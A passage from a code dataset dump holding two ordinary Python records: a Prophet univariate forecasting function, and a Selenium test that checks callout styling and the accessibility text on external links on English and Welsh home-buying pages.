Prophet\n\ndef run_forecast_univariate(df, periods):\n\n \"\"\"\n returns the univariate prophet forecast + two graphic objects (forecast & components)\n\n Parameters\n ----------\n df: DataFrame\n a dataframe that includes the historical data\n periods: int\n the time steps to forecast\n\n Returns\n -------\n forecast\n a dataframe containing the forecast data\n fig_forecast\n the forecast figure to plot\n fig_comp\n the components figure to plot\n \n \"\"\"\n\n #renaming columns for prophet convention\n df = df.rename(columns = {df.columns[0]: \"ds\", df.columns[1]:\"y\"})\n\n # creating a Prophet object \n ## optional parameters can be set here like:\n ## seasonality, changepoints, uncertainty intervals etc. see help(Prophet)\n m = Prophet() \n\n # the fit() method expects a dataframe with the column heads ds and y\n # fits the prophet model to the data\n m.fit(df)\n\n # Definition of forecast range\n ## periods: Int number of periods to forecast forward. \n ## freq: Any valid frequency for pd.date_range, such as 'D' or 'M'.\n future = m.make_future_dataframe(periods=periods, freq = \"H\")\n \n # Prediction\n ## expects a dataframe with dates for predictions \n ## (created above with make_future_dataframe)\n forecast = m.predict(future)\n \n # plotting\n fig_forecast = m.plot(forecast)\n fig_comp = m.plot_components(forecast)\n \n return forecast, fig_forecast, fig_comp\n\n\n","repo_name":"chris-elia/Workshop-TimeSeries-Forecaster","sub_path":"modules/forecast_univariate.py","file_name":"forecast_univariate.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"}
{"seq_id":"32671335096","text":"from selenium.webdriver.common.by import By\nfrom Lib import resize\nfrom Selectors.callout import callout_selectors\n\ndef runTest(baseUrl, driver, browser):\n \n print(' - Testing on {}'.format(browser))\n\n urls = [\n \"/en/homes/buying-a-home/money-timeline-when-buying-property-england-wales-n-ireland\",\n \"/cy/homes/buying-a-home/money-timeline-when-buying-property-england-wales-n-ireland\"\n ]\n\n for url in urls:\n\n iterationUrl = \"{baseUrl}{url}\".format(baseUrl=baseUrl, url=url)\n\n print('\\\\nVisiting {}'.format(iterationUrl))\n driver.get(iterationUrl)\n \n resize.resizeDesktop(driver)\n print('- Testing dominant callout')\n dominant_callout = 
driver.find_element(By.CSS_SELECTOR, callout_selectors.dominant_callout_selector)\n assert dominant_callout.value_of_css_property('margin-top') == \"35px\"\n assert dominant_callout.value_of_css_property('margin-bottom') == \"21px\"\n assert dominant_callout.value_of_css_property('padding') == \"21px 0px 0px\"\n dominant_callout_wrapper = dominant_callout.find_element(By.CSS_SELECTOR, callout_selectors.dominant_callout_wrapper_selector)\n assert dominant_callout_wrapper.value_of_css_property('border-width') == \"8px\"\n assert \"240, 240, 90\" in dominant_callout_wrapper.value_of_css_property('border-color')\n dominant_callout_title = dominant_callout_wrapper.find_element(By.CSS_SELECTOR, callout_selectors.dominant_callout_title_selector)\n assert dominant_callout_title.value_of_css_property('font-size') == \"32px\"\n assert dominant_callout_title.value_of_css_property('font-weight') == \"700\"\n assert \"0, 11, 59\" in dominant_callout_title.value_of_css_property('color')\n assert dominant_callout_title.value_of_css_property('line-height') == \"39px\"\n print(' - Desktop Dominant callout styles ok')\n\n resize.resizeMobile(driver)\n dominant_callout = driver.find_element(By.CSS_SELECTOR, callout_selectors.dominant_callout_selector)\n dominant_callout_title = dominant_callout_wrapper.find_element(By.CSS_SELECTOR, callout_selectors.dominant_callout_title_selector)\n assert dominant_callout_title.value_of_css_property('font-size') == \"25px\"\n assert dominant_callout_title.value_of_css_property('line-height') == \"33px\"\n print(dominant_callout_title.value_of_css_property('line-height'))\n print(' - Mobile Dominant callout styles ok')\n\n resize.resizeDesktop(driver)\n\n print('- Testing branch callout external multi links')\n # Get all branch callouts \n branchCallouts = driver.find_elements(By.CSS_SELECTOR, callout_selectors.branch_callout_selector)\n # Get the external links\n externalLink = branchCallouts[0].find_elements(By.CSS_SELECTOR, 'a[data-link-type=\"external\"]')\n \n # Branch callout styles\n for callout in branchCallouts:\n pass\n\n # Set the expected text based on language\n if \"/en/\" in iterationUrl:\n expectedText = \"(Opens in a new window)\"\n print('- Article is English')\n print('- Expected text {}'.format(expectedText))\n elif \"/cy/\" in iterationUrl:\n expectedText = \"Yn agor mewn ffenestr newydd\"\n print('- Article is Welsh')\n print('- Expected text {}'.format(expectedText))\n\n # If the callout contains external links\n if len(externalLink) > 0:\n\n for link in externalLink:\n # Try and find the spans containing the hidden text\n try:\n linkSpan = link.find_element(By.CSS_SELECTOR, 'span.sr-only')\n spanText = linkSpan.text\n\n assert spanText == expectedText\n print('- External Multi link in branch includes the correct hidden text')\n except:\n message = \"\\\\n> BRANCH CALLOUT: {iterationUrl}\\\\n > WARNING: The external multi links are missing the hidden spans\".format(\n iterationUrl=iterationUrl\n )\n print(message)\n\n else:\n print('- Branch callout does not (or no longer) contain any external links')\n message = \"\\\\n> BRANCH CALLOUT: {iterationUrl}\\\\n - Branch callout does not (or no longer) contain any external links\".format(\n iterationUrl=iterationUrl\n )\n print(message)\n\n print(\"5123 - All callouts should be